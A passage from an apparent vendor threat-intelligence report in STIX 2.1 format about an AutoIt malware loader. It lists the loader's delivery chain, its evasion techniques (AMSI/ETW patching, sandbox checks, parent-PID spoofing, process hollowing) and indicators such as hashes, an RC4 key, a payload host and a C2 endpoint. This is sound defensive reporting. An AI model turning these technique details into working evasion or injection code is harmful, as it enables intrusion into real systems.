   "id": "relationship--c6bbe9aa-e1e2-5af2-b9aa-e442db9c0306",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757903Z",
   "modified": "2026-09-02T03:14:39.757903Z",
   "relationship_type": "consists-of",
   "description": "Lure loads EtherHiding->asseload widget",
   "source_ref": "infrastructure--48e22724-14b7-502e-9960-1ebb02f8eb05",
   "target_ref": "infrastructure--d9d7e354-d7d8-5443-8a63-b1a55cea1d19",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--3bdf6c81-2815-5b61-a5e3-153cd4b6c29d",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.758036Z",
   "modified": "2026-09-02T03:14:39.758036Z",
   "relationship_type": "consists-of",
   "description": "ClickFix clipboard cradle points to payload host",
   "source_ref": "infrastructure--d9d7e354-d7d8-5443-8a63-b1a55cea1d19",
   "target_ref": "infrastructure--f4349a82-f96b-57df-8a4b-4730dd7ef6fa",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--4fd9d357-4ba8-565e-ade9-8e92f80a7f0a",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.758235Z",
   "modified": "2026-09-02T03:14:39.758235Z",
   "relationship_type": "communicates-with",
   "description": "Exfil to C2",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--e679cf84-d122-55f4-8095-2637fc66d1f4",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.758446Z",
   "modified": "2026-09-02T03:14:39.758446Z",
   "relationship_type": "delivers",
   "description": "SFX->AutoIt->native core",
   "source_ref": "infrastructure--f4349a82-f96b-57df-8a4b-4730dd7ef6fa",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--3fd731eb-126f-5ddc-b0aa-9b5777be68ba",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.758611Z",
   "modified": "2026-09-02T03:14:39.758611Z",
   "relationship_type": "targets",
   "description": "Delivered via compromised lure (victim)",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "infrastructure--48e22724-14b7-502e-9960-1ebb02f8eb05",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "malware",
   "spec_version": "2.1",
   "id": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "WP-002 AutoIt Loader (Corpus.a3x)",
   "description": "Compiled-AutoIt (AU3!EA06) loader stage executed as 'AutoIt3.exe Corpus.a3x'. Carries the terminal native x64 core as a single AutoIt string built from ~159 hex concatenations (138,055 bytes), unwrapped at runtime by RC4 (implemented as position-independent x86/x64 stubs invoked through DllCallAddress) followed by LZNT1 via RtlGetCompressionWorkSpaceSize/RtlDecompressFragment. Rebuilds a clean ntdll from \\KnownDlls\\ntdll.dll and from a SEC_IMAGE mapping of the on-disk copy, patches AmsiScanBuffer and four EtwEventWrite* exports, then hollows a CREATE_SUSPENDED child. No persistence, no C2 and no RSA key material are present in this stage.",
   "malware_types": [
    "loader",
    "dropper"
   ],
   "is_family": false,
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "capabilities": [
    "anti-vm",
    "evades-av",
    "hides-artifacts"
   ],
   "implementation_languages": [
    "autoit"
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "malware-analysis",
   "spec_version": "2.1",
   "id": "malware-analysis--a2b5a860-09e7-5d6c-a6a2-f81e74dc0c9e",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "product": "dispensight-secureleaf",
   "analysis_engine_version": "v15.2",
   "result_name": "WP-002 AutoIt Loader (Corpus.a3x)",
   "result": "malicious",
   "analysis_started": "2026-09-02T03:14:39.736229Z",
   "analysis_ended": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--678c7218-3a5d-56a9-b415-22a27296dfd3",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Virtualisation/sandbox evasion — system checks",
   "description": "Loader exits if vmtoolsd.exe, VboxTray.exe or SandboxieRpcSs.exe is running, and aborts if a hard-coded nonsense FQDN resolves (wildcard/sinkhole resolver detection). Also uses VirtualAllocExNuma rather than VirtualAllocEx and QueryPerformanceCounter timing deltas.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1497.001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--ddb1b342-5c58-5634-ab64-e538faedc8e6",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Time-based evasion — AV-conditioned dwell",
   "description": "Sleeps ~20 s and hides its tray icon when avastui.exe is present; sleeps ~160 s and switches hollowing target when bdagent.exe is present.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1497.003"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--377f3e57-25df-5aa0-9967-db5654326c7a",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Security software discovery",
   "description": "ProcessExists checks for avastui.exe, avp.exe, bdagent.exe and virtualisation agents; each branch alters creation flags, dwell time or injection target rather than aborting.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1518.001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--0e2e7fa2-d95f-5e01-aaac-58bf764d2250",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Impair defenses — AMSI and ETW patching",
   "description": "GetModuleHandleA('amsi.dll') -> GetProcAddress('AmsiScanBuffer') is patched in place; EtwEventWrite, EtwEventWriteFull, EtwEventWriteEx and (on x64) EtwEventWriteTransfer are patched in the freshly mapped ntdll image.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1562.001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--9b294875-de76-5ef7-bdb0-2b829f5f325e",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Parent-PID spoofing",
   "description": "When not elevated the loader opens explorer.exe with MAXIMUM_ALLOWED and supplies the handle via UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS), reparenting the hollowed child under Explorer. Suppressed when avp.exe is present.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1134.004"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--7a62b028-e7cc-5309-aa3a-640f10d56d15",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Deobfuscate/decode files or information",
   "description": "Every literal in the a3x passes through one repeating-key XOR decode routine; the embedded core is RC4- then LZNT1-wrapped.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1140"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--b2c9eb80-4706-5fa2-aeb5-9ad91d976544",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Native API — direct ntdll invocation from a clean image",
   "description": "Injection is driven through NtOpenSection/NtMapViewOfSection, NtUnmapViewOfSection, NtWriteVirtualMemory, NtProtectVirtualMemory, NtSetContextThread and NtResumeThread resolved from a KnownDlls-sourced ntdll, with NtWow64* variants for 32-bit hosts.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1106"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--380b1778-8847-579c-aea9-d8c0875f5d2b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Masquerading — legitimate LOLBin as hollowing target",
   "description": "Fallback injection target is %SystemRoot%\\System32\\TapiUnattend.exe, a signed but effectively never-executed Windows binary; the default target is a second copy of the signed AutoIt3.exe interpreter.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1036.005"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--1d4d0765-f949-5b72-94de-1a887544c86c",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "NXDOMAIN sentinel probe",
   "description": "Fixed nonsense FQDN resolved by the loader as a wildcard/sinkhole resolver test; a successful resolution causes the loader to abort. Highest-confidence host anchor in v15.2.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[domain-name:value = 'BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--3cf1b58a-94bc-56df-8ae6-f163dd67b175",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Native core — build B (a3x-embedded)",
   "description": "PE32+ x64, 227,328 bytes, ImageBase 0x140000000, EP RVA 0x21c0, compiled 2026-08-28T11:51:22Z, imphash 754318d99f6bf9d00342a1a491eb8242. Recovered by RC4+LZNT1 unwrapping of the a3x blob. Distinct code from the v15.1 build-A image despite sharing base and EP RVA.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '6e3e5e0d169a79e148f0e73bfee7cad84370069ca9fbedd69e506ffb7780fce9']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--d7a6196e-43a0-5e57-974f-1cceea14496f",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Native core build B — .text",
   "description": "Section hash for the manually-mapped image; whole-image hash mutates once mapped.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '11e2d6f7272175f6f2c4ed794c0d94c39b8b8a1ffe180bf3b1dedaa71584ff94']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--5e9880f6-9f9e-5303-aa6d-1fe6ddb77a10",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Native core build tag",
   "description": "32-character lowercase-hex build/campaign tag in the core .rdata. v15.3 CORRECTION: an earlier pass recorded 33 characters with a leading 'd' — that byte was adjacent binary data picked up by a strings run, not part of the constant. Verified 2026-09-02: this exact value is transmitted as the tag= field of the C2 registration beacon, tying the a3x-recovered image to the cdire.shop C2.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:name = '355039cceb3bd77c4ef50905dc6c375f']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--a056381d-f57a-5e14-9199-06dc0bc2fa31",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Hollowing target — TapiUnattend.exe",
   "description": "Fallback injection target; forced when bdagent.exe is present.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[process:image_ref.name = 'TapiUnattend.exe']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--cb6e2d3d-04ae-54e8-ab0f-78789176397a",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "RC4 stage key literal",
   "description": "35-digit ASCII numeric literal used as the RC4 key for the embedded core. Source-level anchor: present in decompiled AU3 and in script memory, not in the packed a3x string table.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:name = '57289866169362989668663919390480987']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z"
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--5aa29ee6-b48d-5477-ba8c-688013af64a1",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "drops",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ],
   "description": "a3x carries and hollow-injects the native core"
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--9ccf91a9-65d7-534a-a694-b744c7033550",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--678c7218-3a5d-56a9-b415-22a27296dfd3",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--221c0ceb-66b0-56d0-b808-7c4a7352977d",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--ddb1b342-5c58-5634-ab64-e538faedc8e6",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--ed611cf1-b3e3-553f-a9b4-59ea4d9a6fe8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--377f3e57-25df-5aa0-9967-db5654326c7a",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--c04133c0-2605-5244-bec6-24809f445853",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--0e2e7fa2-d95f-5e01-aaac-58bf764d2250",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--f36405e6-ff96-5912-aa15-fa370d5704eb",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--9b294875-de76-5ef7-bdb0-2b829f5f325e",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--6fe9ee9e-365c-5357-b2a3-491dc941d80b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--7a62b028-e7cc-5309-aa3a-640f10d56d15",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--225b6bcd-786b-5941-8237-ebb4d3983db3",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--b2c9eb80-4706-5fa2-aeb5-9ad91d976544",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--ed213163-82d9-59e9-adf8-ed5422b21379",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "uses",
   "source_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "target_ref": "attack-pattern--380b1778-8847-579c-aea9-d8c0875f5d2b",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--c5ce3e1b-8157-5536-a50b-ffc9cc381143",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--1d4d0765-f949-5b72-94de-1a887544c86c",
   "target_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--f588bdb3-48eb-5fcf-b3bf-7841344e3329",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--cb6e2d3d-04ae-54e8-ab0f-78789176397a",
   "target_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--0bca6e76-1153-5969-ae8e-3503438bf60f",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--a056381d-f57a-5e14-9199-06dc0bc2fa31",
   "target_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--9a15163d-d3ea-589e-a3dc-a3388ebca67d",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--3cf1b58a-94bc-56df-8ae6-f163dd67b175",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--1950e95d-ddad-5f55-90a7-11eef9562e02",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--d7a6196e-43a0-5e57-974f-1cceea14496f",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--ba66fbb9-cf4b-5225-bdd9-db77ce9e4377",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--5e9880f6-9f9e-5303-aa6d-1fe6ddb77a10",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--95563f50-86cf-5bcf-8211-13ebe2a62cbf",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "C2 registration beacon schema",
   "description": "One-time check-in: tag (campaign id) + exp (fixed epoch 2026-08-28T07:31:34Z, ~4.3 h before the PE compile timestamp) + hwid (host fingerprint). v15.3 corrects v15.1: this is not a wave variant of the access_token/debug body but a distinct message type in the same session.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[network-traffic:extensions.'http-request-ext'.request_value = '/invoices' AND network-traffic:dst_port = 9048]",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--58702166-10b5-57dc-8531-30b963a23af8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Stager archive from /tools/soft/file",
   "description": "1,621,425-byte ZIP served as Content-Type: text/plain from 193.221.200.66:4139; contains only IntroductionChassis.exe. Second URI on the payload host — v15.1 documented only /tools/soft/coms.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '97860fba4e4d1928154390dd04762f3566e3e5b72300fc7ed7f9e7219faf45b5']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--3913e09f-aad6-5013-9293-ec181c331385",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "PowerShell stager body /tools/soft/coms",
   "description": "243-byte PowerShell recovered in full: downloads the ZIP to %APPDATA%\\c.zip, Expand-Archive to %APPDATA%\\c, removes the archive, Start-Process %APPDATA%\\c\\IntroductionChassis.exe.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '64aa3e37acb9efe05122614e0c1a63f85c264d8adecb845059fad7dbb60c7426']",
   "pattern_type": "stix",
